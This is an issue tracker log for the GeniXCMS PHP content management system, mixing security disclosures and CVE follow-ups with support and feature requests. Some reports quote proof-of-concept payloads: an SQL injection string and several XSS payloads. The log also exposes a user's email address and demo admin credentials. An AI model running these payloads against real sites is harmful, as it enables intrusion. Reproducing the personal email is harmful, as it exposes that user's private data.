[2017-01-22 04:46] #68 closed

[2017-01-22 07:32] #26 closed

[2017-01-22 16:50] semplon commented on #62
Hi @fgeek i just release our major version v1.0.0
You can download and try it.

thanks

[2017-02-09 13:23] superfish9 opened #70 "CSRF in background management of v1.0.0(latest version) discovered by "ADLab of Venustech""
GeniXCMS implement token to defend CSRF in background management webpage. An attacker is able to bypass the defense as follows:
First, visit the forgotpassword.php page and grab a token, which can be used to launch a CSRF attack:
<img width="1391" alt="wx20170209-154200 2x" src="https://cloud.githubusercontent.com/assets/11731632/22784811/80412bd4-ef0c-11e6-82f7-7271d96ca9b2.png">
Then, use the fo

[2017-02-12 16:58] #70 closed

[2017-02-13 10:16] superfish9 opened #71 "SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS v1.0.2(latest) discovered by "ADLab of Venustech""
inc/lib/Control/Backend/menus.control.php(line 377):
[code]
The updateMenuOrder function in inc/lib/Menus.class.php(line 364):
[code]
The update function in inc/lib/Db.class.php(line 322):
[code]
We'll find that the "$key" in **$set .= "`$key` = '$val',";** isn't be filtered, which leads to SQL injection.
PoC:
http://127.0.0.1/genixcms100/gxadmin/index.php?page=menus
POST parameters:
[code]
Don't

[2017-02-13 11:55] semplon commented on #71
thank you, but this had been fixed at the latest release already. see this https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Db.class.php#L322

[2017-02-13 12:25] superfish9 commented on #71
mysql_escape_string filltered single quote, but attacker can do sql injection without single quote, like my PoC.

[2017-02-13 14:39] semplon commented on #71
okay, i'll do some research first.

[2017-04-25 03:53] Hecbi opened #72 "SQL Injection & Mailbox validation logic vulnerabilities & XSS 1.0.2"
# SQL Injection
I find a SQL injection at /inc/lib/Control/Backend/menus.control.php
https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Control/Backend/menus.control.php line 247

[code]

Go http://localhost/gxadmin/index.php?page=menus , find a menus and click del button. Change the position of menuid and token, change menuid into : `menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database

[2017-04-27 01:52] Hecbi commented on #72
Hi, i don't know if you receive this message.

[2017-05-03 18:38] superfish9 opened #73 "XSS in GeniXCMS v1.0.2(latest)"
Register a user and submit a page, which contents  xss payload `<b/oncut=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>M`
<img width="971" alt="wx20170504-023209 2x" src="https://cloud.githubusercontent.com/assets/11731632/25675843/789f48aa-3072-11e7-84f8-8cbea3024c67.png">
When other users  view this page, XSS will take effect.
<img width="731" alt="wx20170504-023031 2x" src="https://cloud.githubu

[2017-05-04 05:21] Hecbi opened #74 "Comment XSS"
Leave a comment with payload: <p onmouseover=javascript:alert(1)>aaaa</p
if admin publish this comment, it will effect.

[2017-05-05 03:43] fgeek commented on #73
This is CVE-2017-8762.

[2017-05-05 03:44] fgeek commented on #71
This is CVE-2017-6065.

[2017-05-05 03:58] superfish9 commented on #73
Discovered by Knownsec.

[2017-05-05 09:39] viccon opened #75 "Arbitrary User Password Reset Vulnerability"
/forgotpassword.php **DOES NOT** limits the **frequency** users submit the password resetting form,
If an attacker sends the request consecutively in a specific time, the target user will be unable to log into his account as his password is changed frequently.

POST  http://localhost/forgotpassword.php
username=admin&token=y3iNFlsz1Ly1wykHWG4N8PKk3MvPet9HAo0a8wycbw7Z4Y1zNNohVCoyy0hr0FehgJVhbXpBh8G

[2017-05-09 05:39] fgeek commented on #74
This is CVE-2017-8780.

[2017-05-23 12:43] gaohuailiang opened #76 "XSS in inc/lib/Site.class.php when view post"
Hello, I found a XSS vulnerability in URL: http://128.18.22.17/GeniXCMS/?post=1. Please confirm.

![xss](https://cloud.githubusercontent.com/assets/28896605/26354671/3150fd64-3ff8-11e7-9be5-069beb67e875.png)

1.Use the latest version of GeniXCMS in github(20170523).
2.Use Internet Explorer.

------------------------------------
Author: gaohuailiang
E-mail: gaohuailiang@huawei.com
Huawei Weiran Lab

[2017-05-25 10:56] semplon commented on #76
please tell me what version did you use ?
see at the bottom of the dashboard page.

[2017-05-25 11:18] gaohuailiang commented on #76
Copyright 2017 GeniXCMS 1.0.2

I cloned the latest code in github yesterday : https://github.com/semplon/GeniXCMS

The vulnerable code is in inc/lib/Site.class.php:
line 92: <link rel=\"canonical\" href=\"".$canonical."\" />

The root cause is $canonical param not checked correctly in blow function, so that attackers could wirte some script code in uri, like http://your-ip/GeniXCMS/?post=1"><scrip

[2017-07-06 00:01] AlexL777 opened #77 "GeniXCMS is now stable and safe?"
Hello Developers,

On the basis of the many security issues here, you also get a first impression of the GeniXCMS. Is it now more stable and safer, or do I have to worry as a Genix user?

I installed it today in version 1.0.2 and would like to collect my experiences with this OpenSource CMS.

Installation was the problem that I forgot to specify the slash `/` during the installation. So, JS/CSS we

[2017-07-07 07:23] semplon commented on #77
Hello @AlexL777 thank you for testing GeniXCMS. We had some updates with our latest stable 1.1.0 but not released yet. You can try this version at the demo site https://demo.genix.id

This 1.1.0 version is more stable and with all mandatory securities issues. We add more features and improvement. I hope this will help you creating a great website. With included magazine style Theme - GneeX.

Unfor

[2017-07-07 09:12] AlexL777 commented on #77
Hi,
Thank you for the short and comprehensible insight into the GeniXCMS. So a blogpost you can already look at my Genix website at https://genixcms.wpzweinull.ch/suchmaschinen-freundliche-urls-beim-genixcms-die-smart-urls-genannt.html :smile:

I have installed the last branch of GitHub on the blog. GenixCMS runs with me on Ubuntu 16, managed server, PHP 7.0 and subdomain as well as with MySQL 5.6

[2017-08-07 05:58] cL0und opened #78 "two loagic bugs in latest product"
Hello Developers,i has found two logic bugs in your product，which maybe cause some problems

I hope this helps you.
the first point:
**at register.php line53**
`if (!User::isSame($_POST['pass1'], $_POST['pass1'])) `
Here, you use the same password for testing

the Second point:
**at register.php line53**
`User::isExist($_POST['userid'])) `,
Let's follow up this function
**User.class.php line222**

[2017-08-26 00:11] semplon commented on #78
thank you for bringing this issue. i will do the fix on the next update.

sorry for long reply, my laptop was stolen and all of my data was lost.

once again, thank you.

[2017-08-26 15:30] cL0und commented on #78
Hello Developers,i was author of *two loagic bugs in latest product.*
I hope you can give me a CVE,if you agree it will bacome my first CVE in my
life,think you.
my id is cL0und

2017-08-26 8:11 GMT+08:00 Puguh Wijayanto <notifications@github.com>:

[2017-09-04 14:25] semplon commented on #78
I've already check the script. the point 1 is not a bug, it just to check whether the inputed password are same or not.

and the second point i got this as issue. and will be commit the fix

for cve, please request cve id at https://cve.mitre.org/cve/request_id.html

[2017-09-05 03:54] semplon commented on #72
thank you for reporting the issue. i will fix this issue soon.

[2017-09-05 04:47] #72 closed

[2017-09-05 04:47] #74 closed

[2017-09-05 04:47] #78 closed

[2017-09-05 04:48] #76 closed

[2017-09-05 05:15] semplon commented on #77
Hello @AlexL777 i just release version 1.1.0 with a lot of features. please check

thanks

[2017-09-05 06:05] fgeek commented on #74
@semplon What release or commit fixes this vulnerability?

[2017-09-05 06:05] fgeek commented on #73
@semplon What release or commit fixes this vulnerability?

[2017-09-05 06:05] fgeek commented on #71
@semplon What release or commit fixes this vulnerability?

[2017-09-05 08:10] semplon commented on #73
this commit i think, e0ad60b2bb967fa3f63c35b92afe84c5f3b31009
it nothing happen when i test it

[2017-09-05 08:14] semplon commented on #73
i'm wrong, this issue is still not fixed yet.

sorry

[2017-09-05 08:28] semplon commented on #71
aahh sorry again, i think i miss this issue.
i'll reopen again

[2017-09-05 14:48] AlexL777 commented on #77
Hi,

Thank you very much, have just made an upgrade successful and now look a bit in the backend. If I should find bugs, I would like to report it here in the issues.

Otherwise, thanks for the new version and I can now continue to work 😄

[2017-09-05 16:13] AlexL777 opened #79 "URL-Rewriting not working"
Hello Developers,

I upgraded to Genix 1.1 today and unfortunately now the URLs in the blog do not work.

A sample URL would be this at https://genixcms.wpzweinull.ch/projektstart-mit-dem-genixcms-auf-genixcms-wpzweinull-ch.html

How can I fix the problem?

Thanks in advance.

P.S. I put on the magazine layout, which was adjustable.

With the blog layout I had it earlier and there everything worke

[2017-09-05 16:19] semplon commented on #79
can you change the variable at  config.php from error_reporting(0); to error_reporting(E_ALL);
and let me see the error

[2017-09-05 16:22] AlexL777 commented on #79
[code]

[2017-09-05 16:27] semplon commented on #79
did the DBHOST at the config using domain ? not localhost ?

[2017-09-05 16:43] AlexL777 commented on #79
OK, Thanks, I have made and now when calling a blog post this error.

[code]

What can be the cause?

Thanks in advance.

[2017-09-08 07:06] fgeek commented on #73
@semplon Could you create new release when you have completely fixed this vulnerability, thanks?

[2017-09-08 07:07] fgeek commented on #71
@semplon Could you create new release when you have completely fixed this vulnerability, thanks?

[2017-09-08 07:09] fgeek commented on #75
Please use [CVE-2017-8827](https://nvd.nist.gov/vuln/detail/CVE-2017-8827) for this issue. Why did you close this issue from the issue tracker? Has this been fixed by some commit in the Git?

[2017-09-08 12:40] cL0und commented on #78
Ok thank you very much

2017-09-05 12:47 GMT+08:00 Puguh Wijayanto <notifications@github.com>:

[2017-09-09 03:08] semplon commented on #71
@fgeek sure, i'm still checking another bug.

[2017-09-09 03:08] semplon commented on #73
sure @fgeek

[2017-09-09 04:28] semplon commented on #79
it's kind of weird, i just testing it and it's working fine at my server.

[2017-09-09 05:19] AlexL777 commented on #79
Hi,

this is interesting. I have switched instead of PHP 7.x to PHP 5.6 and see, since everything works again and the posts with the Maganzin layout are again displayed.

With which version of PHP could you test it with you?

Thanks in advance.

[2017-09-09 06:52] semplon commented on #79
hmmm i see. i'm using PHP 5.6.   i think i should test it with PHP 7.x

[2017-09-09 06:52] AlexL777 opened #80 "Magazine Layout: Adsense involved - from Magazine to Blog Layout"
Hello Develoeprs,

I can unfortunately observe the following at the magazine theme.

If I enter the Adsense code in the field provided for this purpose, the magazine layout automatically changes to the blog layout.

All magazine changes are then no longer valid and a blog layout.

I currently have PHP 5.6.

Can you please check this with the new magazine Theme.

Thanks in advance.

[2017-09-09 06:54] AlexL777 commented on #79
OK thanks. Yes, it does not seem to work with PHP 7.0-7.1. With PHP 5.6 this goes.

[2017-09-09 06:55] semplon commented on #80
@AlexL777 ok, sure. i'll check it

[2017-09-09 07:05] semplon commented on #80
i've already know the problem is. i'll commit it soon and see other bugs exist. if not i'll release the next update,

[2017-09-09 07:11] semplon commented on #75
i think this issue should be opened again.

[2017-09-09 07:19] AlexL777 commented on #80
Okay, then we'll do it. Yes, I know, some bugs are still available. But I have simply patience, rather everything was fixed.

For now, my Genix blog works with the blog layout. SEO URLs also work. Then I have defined in the style.css the headings differently. I felt like the H2 headings were not displayed in the frontend.

A look into the style.css was however positive. H2 CSS rule was included. N

[2017-09-09 08:00] semplon commented on #80
actually you can fix it by following this step :

- open options.php at the gneex theme directory
- go to line 45, and replace this code
   `$opt[$k] = Typo::jsonFormat($v);`
   become
   `$opt[$k] = $v;`

- and save it.

let me know if it works.

actually there are a lot of features for the 1.1.0 release. the problem was my laptop which had the latest update stolen and i had to rebuild again from

[2017-09-09 08:11] AlexL777 commented on #80
Ok, awesome. Your tips helped and I was able to integrate successful Adsense into the blog. This is now displayed via 3 Adsense banners in the frontend.

Think, so my problem is solved 👍

[2017-09-09 08:15] semplon commented on #80
cool, glad it works

[2017-09-09 08:21] AlexL777 commented on #80
😄

[2017-09-09 12:50] AlexL777 opened #81 "How can I display recent Comments in the Sidebar"
Hello Developers,

is there a solution, as I can show recent comments at the Magazine Theme in the right Sidebar?

That would be very helpful, because the Blog Readers see the same, aha, it was commented and that makes the whole thing also exciting.

Thanks in Advance.

[2017-09-10 09:28] semplon commented on #81
nice question. i will add this feature later.

[2017-09-10 09:31] AlexL777 commented on #81
Ok, Thanks!!

[2017-09-10 10:22] semplon commented on #80
Hi @AlexL777 , for H2 please change it here http://prntscr.com/gjcgu5
it's at theme options -> style
see the **Content** part

[2017-09-10 11:23] AlexL777 commented on #80
Thank you, I looked at something, but only briefly flown. Now I know where the backend is.

[2017-09-11 01:30] semplon commented on #81
hello @AlexL777 since You had contribute to GeniXCMS i'll give you Jetbrains Opensource License for you.

please provide your email address so i can send you the license code. thanks

[2017-09-11 01:45] AlexL777 commented on #81
Hi @semplon !
Many Thanks.

That pleases me very much!!

My mail is power_sash@gmx.net

[2017-09-11 01:50] semplon commented on #81
I've already sent the license, you can delete your email detail. thanks

[2017-09-11 01:51] semplon commented on #71
Hello @fgeek, @superfish9  since You had contribute to GeniXCMS, I'll send You JetBrains Opensource License for You. Please provide me with Your email so I can send it to You.

Thanks

[2017-09-11 02:43] #77 closed

[2017-09-11 03:02] #71 closed

[2017-09-11 03:02] #73 closed

[2017-09-11 03:02] #79 closed

[2017-09-11 03:03] #80 closed

[2017-09-13 17:53] AlexL777 opened #82 "I would like to give some Feedback on v1.1.1"
Hello Developers,

thank you in the first place for the new version `v1.1.1`. The upgrade I succeeded today and afterwards I looked more closely in the backend.

The options for adjusting the size of the headings I have found and also so everything looks passable. I could write something about this at https://genixcms.wpzweinull.ch/genix-v1-1-1-cms-update-erschienen-bugfixes-und-sicherheit.html. T

[2017-09-14 05:41] #75 closed

[2017-09-14 05:41] #81 closed

[2017-09-14 05:52] semplon commented on #82
Hello @AlexL777

Thank You, I just release version 1.1.2 which had recent comments. Please upgrade it to version 1.1.2

Thanks

[2017-09-14 15:42] AlexL777 commented on #82
Hi,

Thanks for that and I could already upgrade. Everything looks good now with the last comments in the sidebar.

[2017-09-14 15:59] semplon commented on #82
awesome.

[2017-09-14 16:16] #82 closed

[2017-09-19 00:10] AlexL777 opened #83 "Feature Requests: Word Counter in Editor and TagCloud for the Sidebar"
Hi Developers,

I now work very much with the GenixCMS and have thought of two function requests.

Can a word counter be implemented in the editor? This is where written words are counted and so the blogger knows, aha, so and so many words he has already written.

The second function you would want is the TagCloud for the sidebar. If you could still set the number of tags, it would be great. Also,

[2017-09-19 08:01] semplon commented on #83
hello @AlexL777 that would be good. I'll manage it with the next release.

thank you

[2017-09-19 13:11] AlexL777 commented on #83
Hi,

ok, thank you in advance. Since I am looking forward to these two features.

[2017-09-19 23:36] AlexL777 opened #84 "Footer-Menu on Magazin Theme not worked"
Hello Developers,

you can check the footer menu at the magazine theme. Can you add links and pages to the footer menu?

For me it does not work and nothing is added. That would be my question now.

Thanks in advance.

[2017-09-20 00:51] semplon commented on #84
Hello @AlexL777 , thank you for the report. Yes, it doesn't appear. I'll take a look at it.

[2017-09-21 05:45] Ph0rse opened #85 "The latest version 1.1.4 have some bugs"
In the latest version 1.1.4, I found five vulnerabilities.
Vulnerability details have been posted on my blog.
The link is : http://ph0rse.me/2017/09/21/GeniXCMS-1-1-4%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC-getshell/
Want to be able to apply to CVE ID, thanks!

[2017-09-24 17:04] semplon commented on #83
this features already implemented, see demo https://demo.genix.id/

[2017-09-24 17:05] #84 closed

[2017-09-24 17:05] #83 closed

[2017-09-24 17:06] #85 closed

[2017-09-25 10:15] AlexL777 opened #86 "Feedback about Genix 1.1.5"
Hello Developers,

thanks in the first place for the new Genix 1.1.5 update. It has worked and you have also improved the security. I always welcome this as a CMS blogger. The Footer navigation works and the TagCloud is displayed.

A question on the edge I have nevertheless.

Can I somehow set that the TagCloud only once in the sidebar and not in the footer is narrowed.

So it might be double. Per

[2017-09-25 14:32] semplon commented on #86
hello @AlexL777 thank you for the suggestion. yeah it's a little bit too much when had two tag cloud in one page. i think i will add some options at the theme options so we can choose to show the tag at the footer or sidebar.

thanks,

[2017-09-25 14:37] AlexL777 commented on #86
Hi @semplon ,

Thank you for greeting my suggestion. That would be good if you can still set the TagCloud via an option.

Since I have just a lot of patience when you make a new update, I will also update with me.

[2017-09-28 17:46] fgeek commented on #71
@semplon Thank you for the offer, but not needed. I'm just here to make the internet more safer place for everyone and improve the quality of GeniX.

[2017-09-29 00:58] semplon commented on #71
okay @fgeek, i'am really appreciate all your hard work to make GeniX more secure.

Thank You

[2017-11-01 12:22] AlexL777 opened #87 "How can I embed Youtube Videos in Genix CMS?"
Hello Developers,

I would also like to work with Youtube videos in Genix CMS. How can I embed them so that they appear in the blog post? Is there a possibility and maybe we need a new tool for the editor in Genix CMS?

Thanks in Advance.

[2017-11-03 05:49] vdanelia commented on #87
it's easy, embed it via tinymce editor

[2017-11-03 13:35] AlexL777 commented on #87
Thanks for the helpful tip. So I already embedded the videos.

[2017-11-16 11:31] #87 closed

[2017-11-23 11:19] DanielBishtawi opened #88 "Advisory from Netsparker - GeniXCMS 1.1.5 vulnerability"
Hello,

While testing the Netsparker web application security scanner we identified a vulnerability in GeniXCMS 1.1.5. Can you please advise whom shall we contact to disclose the vulnerability details so it can be fixed?

Please email me: daniel at netsparker dot com

Looking forward to hearing from you.

Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scann

[2017-11-24 16:09] AlexL777 opened #89 "Are Comments possible under Pages - Magazine Layout"
Hello Developers,

I would also like comments under the pages on the Genix CMS. Would it work technically?

Thanks in Advance.

P.S. I use the magazine layout.

[2017-12-03 01:40] semplon commented on #88
I emailed You,

Thanks,

[2017-12-03 01:42] semplon commented on #89
sure it can. You can add the code like this

go to inc/themes/gneex/
open page.php
go to line 21 and then press enter
paste this code
[code]

i hope this work

[2017-12-03 12:13] AlexL777 commented on #89
Hi,
Thanks for that!

I only have this warning on one page.

    Warning: Division by zero in /xxxxxxxxxxxxxxx/genixcms.wpzweinull.ch/inc/lib/Paging.class.php on line 85

How can it fix?

Thanks in advance.

[2017-12-04 04:11] semplon commented on #89
ah, i see. i forgot to add the `$comment` variables.
replace the code with this.
[code]

[2017-12-04 04:38] AlexL777 commented on #89
Thanks for that!

Everything works again. Excellent!

[2017-12-05 15:08] #89 closed

[2017-12-10 15:00] ghost opened #90 "Atomic ModSecurity locks the Admin Access"
Hi Developers,

I have Genix Blog now under Centos 7.4 with Plesk and Atomic ModSecurity. Unfortunately, the security rules block my access to the admin area. It says the following in the logs.

    [msg "Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS"] [severity "CRITICAL"]

What security rules do I have to allow, so that I can log in again in the admin sector?

Thanks in advance.

[2017-12-26 01:00] semplon commented on #90
hi, sorry for late reply. for your problem. had you test it with wordpress ?

as i search at google. there are some problem exist like you do.

you can try this, since genix had similar rewrite rule / htaccess with wordpress

https://www.liquidweb.com/kb/wordpress-modsecurity-rules/

https://www.frameloss.org/2011/07/29/stopping-brute-force-logins-against-wordpress/

let me know if problem exist.

[2018-01-24 15:03] AlexL777 commented on #90
Hi @semplon ,

sorry for my late reply :)

I own two webhostings, once on rootserver and in shared hosting. So I installed Genix on shared hosting. Runs without problems.

ModSecurity is extremely strict and I have found the rules that need to be disabled. But unfortunately I do that, my server is no longer accessible.

That's why the good project is now on shared hosting and I'm in the admin sect

[2019-01-05 12:37] fgeek commented on #88
@semplon Is this vulnerability fixed or do you need more information, help or something? Netsparker has announced this vulnerability publicly:

https://lists.openwall.net/full-disclosure/2019/01/04/5
https://www.netsparker.com/web-applications-advisories/ns-18-039-cross-site-scripting-in-genixcms/

[2019-03-31 02:28] semplon commented on #88
oh yes, i miss this security issue. i will fix it soon. thanks for the info @fgeek

[2019-12-15 05:00] #88 closed

[2019-12-16 07:39] prbt2016 opened #91 "Treeview menu for Posts and Settings not working"
Hello,

I manually installed GenixCMS 1.1.6 on PHP 7.2.7, Apache 2.2, MYSQL 5.5, Centos 6.4 . However post successful installation I found that the treeview menu for Posts and Settings are not working properly. Clicking on the pull right container ,shows no sub-categories under 'Posts' and 'Settings' categories, it's breaking.

Also only png images are loaded properly. Uploading other types of ima

[2019-12-16 16:01] semplon commented on #91
Hello @prbt2016 i will check it soon. It seems i mistakenly remove the dashboard js file.

You can download the master branch zip file. It is the full code.

I will check again about the image. Not every images loaded properly when creating thumbnail. It's for security purpose.

[2019-12-17 09:01] #91 closed

[2019-12-18 03:54] prbt2016 commented on #91
Thanks :)

[2019-12-18 04:28] semplon commented on #91
@prbt2016  can you use php 7.5.2 above ? some code require this version above.

[2019-12-18 04:57] semplon commented on #86
this issue closed at version v1.1.7

[2019-12-18 04:57] #86 closed

[2019-12-27 07:26] semplon opened #92 "Tag page get wrong ID from the Loop"
For some conditions, since it's join table Tag page get wrong ID from the loop. It should `post_id` not just `id`

https://github.com/semplon/GeniXCMS/blob/ca36f47569db778087bb5cb6cf785e68817624c8/inc/themes/gneex/tag.php#L52

[2020-01-09 04:15] semplon opened #93 "Optimizing Query for Pagination"
https://github.com/semplon/GeniXCMS/blob/ca36f47569db778087bb5cb6cf785e68817624c8/inc/lib/Paging.class.php#L67

This query will slow down and even can make crash if there are a lot of data. tested with 120.000 rows of data.

[2020-01-09 19:28] semplon opened #94 "Minimize Inline CSS and JS"
Try to keep **JS** and **CSS** wrote at the external files.
Specially for main structure.

Example :
https://github.com/semplon/GeniXCMS/blob/ca36f47569db778087bb5cb6cf785e68817624c8/gxadmin/themes/footer.php#L104-L183

https://github.com/semplon/GeniXCMS/blob/ca36f47569db778087bb5cb6cf785e68817624c8/gxadmin/themes/footer.php#L219-L280

[2020-01-10 08:15] semplon opened #95 "Error Occur when Add User from Dashboard"
`Notice: Array to string conversion in \inc\lib\Http.class.php on line 171`

This error occur when add user from backend.

[2020-07-27 10:41] andre-checkmarx commented on #78
Selamat pagi!
I think you have misread the code. The following line uses the same `POST` argument twice:

https://github.com/semplon/GeniXCMS/blob/dd6e07f0c7525b025110efc250bb23b29309a820/register.php#L53

So you're effectively doing `p1 == p1` instead of `p1 == p2`.

[2020-07-28 00:01] semplon commented on #78
@andre-checkmarx ah you are right. i will take a look. and fixed it.
it's been so long not updated since i am trying to migrate to bootstrap 4.

[2020-07-28 08:52] andre-checkmarx commented on #78
Awesome, glad I could help!
Also, do you have a way we can contact you privately, to discuss other vulnerabilities?

[2020-07-29 14:13] semplon commented on #78
yes you can contact me at telegram @metalgenix

[2020-09-21 02:16] #92 closed

[2020-09-21 02:18] #93 closed

[2020-09-22 07:23] semplon opened #100 "Cannot Log in v1.1.9"
**Describe the bug**
Login Success but it's failed to enter the dashboard admin

**To Reproduce**
Steps to reproduce the behavior:
1. Go to 'login.php'
2. Login with credentials,
3. Always back to home when to enter 'gxadmin'

**Expected behavior**
It should be logged in to gxadmin

[2020-09-22 10:05] jameswill opened #101 "Unable to login into admin panel in GeniXCMS 1.1.9"
**Describe the bug**
Unable to login into admin panel post installing it successfully. It gives following error.

_**Token not exist, or your time has expired. Please refresh your browser to get a new token.**_

**To Reproduce**
Steps to reproduce the behavior:
1. Go to admin page
2. add the admin details
4. See error

**Expected behavior**
Allowed to login

[2020-09-22 10:20] semplon commented on #101
@jameswill thank you for the report. i will take check it again. i do can't login either. but i got no token error. i will do check for it.

once again, thanks

[2020-09-23 04:04] #100 closed

[2020-09-23 04:04] semplon commented on #101
fixed

[2020-09-23 08:59] jameswill commented on #101
Hello @semplon ,

I am getting the same error in version 1.1.10 i.e :

_Token not exist, or your time has expired. Please refresh your browser to get a new token._

Also on front-end page the welcome text is not changed i.e Welcome to GenixCMS 1.1.8, which should be 'Welcome to GenixCMS 1.1.10'.

This text comes from options table under 'value'  column filed corresponding to column 'name' field 'g

[2020-09-23 09:34] semplon commented on #101
hello @jameswill thank you for your reply. i will check it again and see the error. please do check the demo site

https://demo.genix.me
username : admin
password : admin

yes i forgot to change the options value at the install class. i will fix it.

Thank You,

[2020-09-23 10:20] jameswill commented on #101
Hello @semplon ,

Thanks for your prompt response. Checked with the demo site as well. Got the same error there as well.

Regards.

[2020-09-24 05:41] jameswill commented on #101
Hi,

I am still getting the same error while logging into admin panel in GeniXCMS 1.1.11 version as well.

i.e **_Token not exist, or your time has expired. Please refresh your browser to get a new token._**

However the front end version number issue got resolved.

[2020-09-24 06:42] semplon commented on #101
okay, thanks @jameswill for the information.
I will check it thoroughly. the token validation is too strict I suppose.

Did You install it at localhost or on the internet ? I need more information to do the modification.

please run this at the php and share the output

[code]

[2020-10-01 04:45] jameswill commented on #101
Hi,

Sorry for the late reply.

I have installed on

Attaching the output your were asking for.

HTTP_HOST: DOMAIN.COM
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
HTTP_ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
HTTP_ACCEPT_LANGUAGE: en-US,en;q=0.5
HTTP_ACCEPT_ENCODING: gzip, deflate
HTTP_CONNECTION: keep-al

[2020-10-02 22:17] semplon commented on #101
Hello @jameswill thanks for your reply. I know now why does it's now work. Your server didn't passing the $_SERVER['HTTP_SCHEME']

New update of GeniXCMS need this variable to validate token. When the value is not match it won't work.

[2020-10-06 10:15] jameswill commented on #101
Hi,

What would be the work around for this ? Or what could be solution for this ?

[2020-10-06 10:34] semplon commented on #101
I think just removing $protocol at the Token validate method will fix this problem.

I will update it soon, i am still busy with another project.

[2020-10-08 05:26] jameswill commented on #101
Hi,

Sure. I shall wait for the new version with the fix.

Please let me know.

[2020-10-15 13:15] orionseye opened #102 "Cannot access admin on localhost"
Hi,

just try to install GeniXCMS on   localhost/GeniXCMS  but after entering admin credentials, i get 404 not found error.
What's the procedure installing on a sub-folder? Does GeniXCMS need rewrite rules enabled with htaccess?
Actually, the URL i stuck in is http://localhost/GeniXCMS/?step=4

[2020-10-15 14:16] semplon commented on #102
Hi @orionseye what happen when You open this page ? http://localhost/GeniXCMS/

GeniXCMS doesn't require rewrite rules. but it's best with rewrite rule enabled.

[2020-10-16 03:14] semplon commented on #102
okay, cool. yes i see that. will be fixed on the next update.

[2020-10-16 03:14] #102 closed

[2021-01-21 03:04] #101 closed

[2021-01-21 04:48] jameswill commented on #101
Hi,

I wanted to know why is this issue closed ?

Is this resolved ? I was notified that with the new release this issue will resolve ? Is there new update available with the fix ?

[2021-01-22 14:37] semplon commented on #101
Hi, @jameswill yes, it does. It's been fixed.

[2021-02-15 10:17] jameswill commented on #101
Hello @semplon,

The issue still persists in 1.1.11 version. I have tested the manual installation on Centos 6.9 Final with PHP 7.2.24, MYSQL 5.5.62, Apache 2.2.34. Still getting the same error i.e:

**Token not exist, or your time has expired. Please refresh your browser to get a new token.**

Could you please replicate this issue and post a fix for the same?.

[2021-06-24 07:04] semplon opened #106 "PHP message: PHP Notice: Undefined index: HTTP_USER_AGENT in lib/Session.class.php on line 57"
error on background, must be gone. and no errors recorded.

[2021-06-24 07:08] semplon opened #107 "Token Validation need Improvement."
it's better valdiate using session key rather than url hash

[2021-06-24 07:33] semplon opened #108 "Capabilities to use Multiple database server. Best practice for Master and Slave database"
Write on Master, Read on slave.

[2021-06-25 01:23] semplon opened #109 "Layout Not displayed correctly on Register.php"
**Describe the bug**
The layout is messed up on register.php page

**To Reproduce**
Steps to reproduce the behavior:
1. Go to 'register.php'

**Expected behavior**
the layout should be normal, the footer part must be on place.

**Screenshots**
![image](https://user-images.githubusercontent.com/3163608/123354747-73372c00-d58e-11eb-8e34-4d22d564fb6a.png)

[2021-06-25 01:25] semplon opened #110 "User not inserted correctly during installation"
**Describe the bug**
when install and finish on step 4, the user was not inserted ito database. this problem occure on dev version.

**To Reproduce**
Steps to reproduce the behavior:
1. run the installation and finish the process.

**Expected behavior**
the installation process should be run smoothly, and all of the information must be inserted into database.

**Screenshots**
![image](https://user

[2022-01-09 12:40] JamieSlome opened #111 "Responsible disclosure policy"
Hey there!

I belong to an open source security research community, and a member (@truonghuuphuc) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a `SECURITY.md` file with an email, or another contact method? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) this best pr